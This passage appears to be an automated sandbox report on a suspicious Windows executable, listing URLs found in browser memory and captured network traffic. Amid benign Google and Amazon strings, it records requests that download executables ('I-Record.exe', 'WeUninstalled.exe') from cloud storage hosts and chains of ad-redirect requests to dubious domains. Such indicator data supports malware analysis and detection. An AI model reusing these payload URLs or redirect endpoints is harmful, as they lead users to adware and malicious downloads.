Source: chrome.exe, 00000017.00000003.381226824.000001AC60661000.00000004.00000001.sdmp, chrome.exe, 00000017.00000002.390931369.000001AC60664000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.382505985.000001AC60662000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.379149196.000001AC6065F000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_divxllgy
Source: chrome.exe, 00000018.00000003.375853141.0000018BF1F36000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.395895714.0000018BEE69F000.00000004.00000001.sdmp, chrome.exe, 00000019.00000003.391401148.0000020F030CE000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: chrome.exe, 00000017.00000003.381226824.000001AC60661000.00000004.00000001.sdmp, chrome.exe, 00000017.00000002.390931369.000001AC60664000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.382505985.000001AC60662000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.379149196.000001AC6065F000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flashEy
Source: chrome.exe, 00000018.00000003.396527841.0000018BEE6A7000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.404449133.0000018BEE6A7000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.395895714.0000018BEE69F000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flashl0
Source: chrome.exe, 00000018.00000003.381851813.0000018BF0E69000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.410089762.0000018BF0E6A000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.399593564.0000018BF0E6A000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flasht
Source: chrome.exe, 00000015.00000003.348919437.000002DEF170C000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.352370914.000002DEF171A000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.351023704.000002DEF1718000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.349219195.000002DEF1719000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.349105128.000002DEF1717000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.350330430.000002DEF1708000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.348956059.000002DEF1716000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.348806445.000002DEF1706000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.356125427.000001AC60678000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.357535577.000001AC6067E000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.352521474.000001AC60679000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.352904064.000001AC60683000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.354928622.000001AC60686000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.388164041.000001AC6068A000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.351896441.000001AC60673000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.381226824.000001AC60661000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.382505985.000001AC60662000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.354428587.000001AC60684000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.358440114.000001AC60685000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.379149196.000001AC6065F000.00000004.00000001.sdmp, chrome.exe, 00000017.00000002.391374856.000001AC6068B000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.414894128.0000018BF1F3A000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.359537428.0000018BEE6BF000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.358735959.0000018BEE6BA000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.361364428.0000018BEE6C7000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.376044571.0000018BEE6BF000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.375853141.0000018BF1F36000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.354772182.0000018BEE6B9000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.396013581.0000018BEE6CA000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.354616344.0000018BEE6B5000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.356225093.0000018BEE6C8000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.355581746.0000018BEE6C3000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.404678337.0000018BEE6CB000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.356869908.0000018BEE6C8000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.355844714.0000018BEE6C7000.00000004.00000001.sdmp, chrome.exe, 00000019.00000003.378461475.0000020F7E59C000.00000004.00000001.sdmp, chrome.exe, 00000019.00000003.358692142.0000020F7E5A7000.00000004.00000001.sdmp, chrome.exe, 00000019.00000003.358021122.0000020F7E5A6000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: chrome.exe, 00000017.00000003.381226824.000001AC60661000.00000004.00000001.sdmp, chrome.exe, 00000017.00000002.390931369.000001AC60664000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.382505985.000001AC60662000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.379149196.000001AC6065F000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.396527841.0000018BEE6A7000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.414894128.0000018BF1F3A000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.404449133.0000018BEE6A7000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.375853141.0000018BF1F36000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.395895714.0000018BEE69F000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
Source: chrome.exe, 00000018.00000003.396527841.0000018BEE6A7000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.404449133.0000018BEE6A7000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.395895714.0000018BEE69F000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_pdfjs2
Source: chrome.exe, 00000017.00000003.372345068.000001AC63EC6000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.396527841.0000018BEE6A7000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.404449133.0000018BEE6A7000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.395895714.0000018BEE69F000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
Source: chrome.exe, 00000017.00000003.381226824.000001AC60661000.00000004.00000001.sdmp, chrome.exe, 00000017.00000002.390931369.000001AC60664000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.382505985.000001AC60662000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.379149196.000001AC6065F000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime~y
Source: chrome.exe, 00000018.00000003.355844714.0000018BEE6C7000.00000004.00000001.sdmp, chrome.exe, 00000019.00000003.378461475.0000020F7E59C000.00000004.00000001.sdmp, chrome.exe, 00000019.00000003.358692142.0000020F7E5A7000.00000004.00000001.sdmp, chrome.exe, 00000019.00000003.358021122.0000020F7E5A6000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: chrome.exe, 00000019.00000003.378461475.0000020F7E59C000.00000004.00000001.sdmp, chrome.exe, 00000019.00000003.358692142.0000020F7E5A7000.00000004.00000001.sdmp, chrome.exe, 00000019.00000003.358021122.0000020F7E5A6000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_real.b
Source: chrome.exe, 00000015.00000003.348919437.000002DEF170C000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.352370914.000002DEF171A000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.351023704.000002DEF1718000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.349219195.000002DEF1719000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.349105128.000002DEF1717000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.350330430.000002DEF1708000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.348956059.000002DEF1716000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.348806445.000002DEF1706000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_realy
Source: chrome.exe, 00000017.00000003.388227724.000001AC63EC4000.00000004.00000001.sdmp, chrome.exe, 00000017.00000002.403756014.000001AC63EC5000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.381226824.000001AC60661000.00000004.00000001.sdmp, chrome.exe, 00000017.00000002.390931369.000001AC60664000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.382505985.000001AC60662000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.379149196.000001AC6065F000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.396527841.0000018BEE6A7000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.404449133.0000018BEE6A7000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.395895714.0000018BEE69F000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
Source: chrome.exe, 00000017.00000003.381226824.000001AC60661000.00000004.00000001.sdmp, chrome.exe, 00000017.00000002.390931369.000001AC60664000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.382505985.000001AC60662000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.379149196.000001AC6065F000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave0lc
Source: chrome.exe, 00000015.00000003.348919437.000002DEF170C000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.352370914.000002DEF171A000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.351023704.000002DEF1718000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.349219195.000002DEF1719000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.349105128.000002DEF1717000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.350330430.000002DEF1708000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.348956059.000002DEF1716000.00000004.00000001.sdmp, chrome.exe, 00000015.00000003.348806445.000002DEF1706000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.356125427.000001AC60678000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.357535577.000001AC6067E000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.352521474.000001AC60679000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.352904064.000001AC60683000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.354928622.000001AC60686000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.388164041.000001AC6068A000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.351896441.000001AC60673000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.381226824.000001AC60661000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.382505985.000001AC60662000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.354428587.000001AC60684000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.358440114.000001AC60685000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.379149196.000001AC6065F000.00000004.00000001.sdmp, chrome.exe, 00000017.00000002.391374856.000001AC6068B000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.359537428.0000018BEE6BF000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.358735959.0000018BEE6BA000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.361364428.0000018BEE6C7000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.396075862.0000018BEE6D0000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.376044571.0000018BEE6BF000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.354772182.0000018BEE6B9000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.396013581.0000018BEE6CA000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.354616344.0000018BEE6B5000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.356225093.0000018BEE6C8000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.355581746.0000018BEE6C3000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.356869908.0000018BEE6C8000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.355844714.0000018BEE6C7000.00000004.00000001.sdmp, chrome.exe, 00000019.00000003.378461475.0000020F7E59C000.00000004.00000001.sdmp, chrome.exe, 00000019.00000003.358692142.0000020F7E5A7000.00000004.00000001.sdmp, chrome.exe, 00000019.00000003.358021122.0000020F7E5A6000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: chrome.exe, 00000018.00000003.375853141.0000018BF1F36000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.395895714.0000018BEE69F000.00000004.00000001.sdmp, chrome.exe, 00000019.00000003.391401148.0000020F030CE000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: chrome.exe, 00000018.00000003.381851813.0000018BF0E69000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.410089762.0000018BF0E6A000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.399593564.0000018BF0E6A000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6258784-0000
Source: chrome.exe, 00000017.00000003.381226824.000001AC60661000.00000004.00000001.sdmp, chrome.exe, 00000017.00000002.390931369.000001AC60664000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.382505985.000001AC60662000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.379149196.000001AC6065F000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6258784Oy
Source: chrome.exe, 00000018.00000003.396527841.0000018BEE6A7000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.404449133.0000018BEE6A7000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.395895714.0000018BEE69F000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6258784_win.dll
Source: 7((_8888YTR(.exe, 00000003.00000002.323919834.0000000002D62000.00000004.00000001.sdmp, 7((_8888YTR(.exe, 00000003.00000002.323595078.0000000002C01000.00000004.00000001.sdmp	String found in binary or memory: https://wewewe.s3.eu-central-1.amazonaws.com/WeUninstalled.exe
Source: chrome.exe, 0000001B.00000003.369015948.000002631EBA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.amazon.ca
Source: chrome.exe, 0000001B.00000003.369015948.000002631EBA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.amazon.co.br
Source: chrome.exe, 0000001B.00000003.369015948.000002631EBA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.amazon.co.jp
Source: chrome.exe, 0000001B.00000003.369015948.000002631EBA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.amazon.co.uk
Source: chrome.exe, 0000001B.00000003.369015948.000002631EBA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.amazon.com
Source: chrome.exe, 0000001B.00000003.369015948.000002631EBA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.amazon.com.mx
Source: chrome.exe, 0000001B.00000003.369015948.000002631EBA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.amazon.de
Source: chrome.exe, 0000001B.00000003.369015948.000002631EBA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.amazon.es
Source: chrome.exe, 0000001B.00000003.369015948.000002631EBA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.amazon.fr
Source: chrome.exe, 0000001B.00000003.369015948.000002631EBA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.amazon.in
Source: chrome.exe, 0000001B.00000003.369015948.000002631EBA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.amazon.it
Source: chrome.exe, 00000019.00000003.379375637.0000020F7E5E2000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000017.00000002.393990429.000001AC62CD0000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/h
Source: chrome.exe, 00000017.00000002.393990429.000001AC62CD0000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.408064386.0000018BF0DB3000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.398771103.0000018BF0DA9000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.400027194.0000018BF0DB2000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000017.00000002.393990429.000001AC62CD0000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfoJ
Source: chrome.exe, 00000017.00000002.393990429.000001AC62CD0000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.408064386.0000018BF0DB3000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.398771103.0000018BF0DA9000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.400027194.0000018BF0DB2000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000017.00000002.393990429.000001AC62CD0000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.408064386.0000018BF0DB3000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.398771103.0000018BF0DA9000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.400027194.0000018BF0DB2000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000017.00000002.393990429.000001AC62CD0000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.408064386.0000018BF0DB3000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.398771103.0000018BF0DA9000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.400027194.0000018BF0DB2000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000017.00000002.393990429.000001AC62CD0000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/v
Source: chrome.exe, 00000017.00000002.396895083.000001AC62D76000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.379610644.0000018BF0E20000.00000004.00000001.sdmp, chrome.exe, 00000018.00000002.409493974.0000018BF0E20000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.396893781.0000018BF0E20000.00000004.00000001.sdmp	String found in binary or memory: https://www.gstatic.com/chrome/config/plugins_3/plugins_win.json
Source: chrome.exe, 00000019.00000003.367991918.0000020F01EBE000.00000004.00000001.sdmp	String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000015.00000003.349307421.000002DEF3D81000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.355152532.000001AC62CD1000.00000004.00000001.sdmp, chrome.exe, 00000018.00000003.357238231.0000018BF0D91000.00000004.00000001.sdmp	String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/translate_ranker_20180123
Source: chrome.exe, 0000001B.00000003.369015948.000002631EBA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.hulu.com
Source: chrome.exe, 0000001B.00000003.369015948.000002631EBA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.netflix.com
Source: chrome.exe, 00000017.00000002.390674295.000001AC60649000.00000004.00000020.sdmp	String found in binary or memory: https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab9
Source: chrome.exe, 00000017.00000002.390134031.000001AC60600000.00000004.00000020.sdmp	String found in binary or memory: https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
Source: chrome.exe, 00000017.00000002.390466154.000001AC60623000.00000004.00000020.sdmp	String found in binary or memory: https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad0-
Source: chrome.exe, 00000017.00000002.390134031.000001AC60600000.00000004.00000020.sdmp	String found in binary or memory: https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dadC:
Source: chrome.exe, 00000017.00000002.390466154.000001AC60623000.00000004.00000020.sdmp	String found in binary or memory: https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dadH
Source: chrome.exe, 00000017.00000002.390134031.000001AC60600000.00000004.00000020.sdmp	String found in binary or memory: https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dadI
Source: chrome.exe, 00000017.00000002.402849053.000001AC63E6E000.00000004.00000001.sdmp, chrome.exe, 00000017.00000003.380192205.000001AC63E6E000.00000004.00000001.sdmp	String found in binary or memory: https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dadRr
Source: chrome.exe, 00000017.00000002.390134031.000001AC60600000.00000004.00000020.sdmp	String found in binary or memory: https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dado
Source: chrome.exe, 00000017.00000003.372057034.000001AC63EC1000.00000004.00000001.sdmp, chrome.exe, 00000017.00000002.403709352.000001AC63EC2000.00000004.00000001.sdmp	String found in binary or memory: https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dadr
Source: chrome.exe, 0000001B.00000003.369015948.000002631EBA1000.00000004.00000001.sdmp	String found in binary or memory: https://www.youtube.com

Source: unknown

DNS traffic detected: queries for: onepiece.s3.pl-waw.scw.cloud

Source: global traffic	HTTP traffic detected: GET /pub-carousel/I-Record.exe HTTP/1.1Accept: /User-Agent: InnoDownloadPlugin/1.5Host: onepiece.s3.pl-waw.scw.cloudConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: www.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /afu.php?id=1294231 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /afu.php?zoneid=1492888&var=3 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /afu.php?zoneid=1851483 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /afu.php?zoneid=1343177&var=3 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5
Source: global traffic	HTTP traffic detected: GET /afu.php?zoneid=1851513 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic	HTTP traffic detected: GET /afu.php?id=1339680 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic	HTTP traffic detected: GET /afu.php?zoneid=1620783&var=3 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic	HTTP traffic detected: GET /jump/next.php?r=2087215 HTTP/1.1Host: www.directdexchange.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /afu.php?id=1343178 HTTP/1.1Host: vexacion.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: oaidts=1642179591; OAID=9e0881623ede4761988854597c23d8e5; syncedCookie=true
Source: global traffic	HTTP traffic detected: GET /jump/next.php?stamat=m%257C%252CwI2Z7Y2LqB1dwP0dEdHP3xP.19a%252C2t5FkDDYpjxJXsMWHSh7wKsTFo_9DWdVnHcBDLzDvAWvvhwYRZDYe0ZsowfF7dmW&cbur=0.8941180851075679&cbtitle=&cbiframe=0&cbWidth=1034&cbHeight=876&cbdescription=&cbkeywords=&cbref= HTTP/1.1Host: www.directdexchange.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /script/i.php?stamat=m%257C%252C%252Cg3PWYhE6oGU3BU9GH0dEdHP3xP.496%252CJ9Q8Q_UIgs9Kxcxyx-U4wQshKBKNG7-rYnaHixyxr6OH3VPRfwqQ_GzwHdPFlPRwWa5YU7zZdRMNDmj_4g5-h2wdkbz4dMJC0Fnhbe1neELDcqALiMA96kJC8cdtqOp1si_2RBYwy2ChjFCPi-ttcaIhRwhqQGPSaPYGkeLfZI13I_KMwt-_2ZpPRlduEaKwwVxJ3hmqpkoFZz7WR-XN4cWIYSoehHUTeiSRufDIuK6-ZcZlgq93EWKTszRNcRAnpS9DuIfFTDCOBbvQY9cXObu86hWi-C-HKoLKExk7eXxe_dxN-nGiZai-IBxKthk8inK9EddpeuzlMuf3EAqbFpqEEBcRT3UYmR6ypfVFabU3r55Ct7X_1lz8GPCzsfPdgAEWXXMLmEZvtRcz1E3Fa4rSLYHFiZml5KHWP_4RSIx925l41NlYou6QyD0qghav2U80t5X0TUB6ZYI74CNCvXDBqX9c-5JmRQvLGV5Wrx0%252C HTTP/1.1Host: www.directdexchange.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
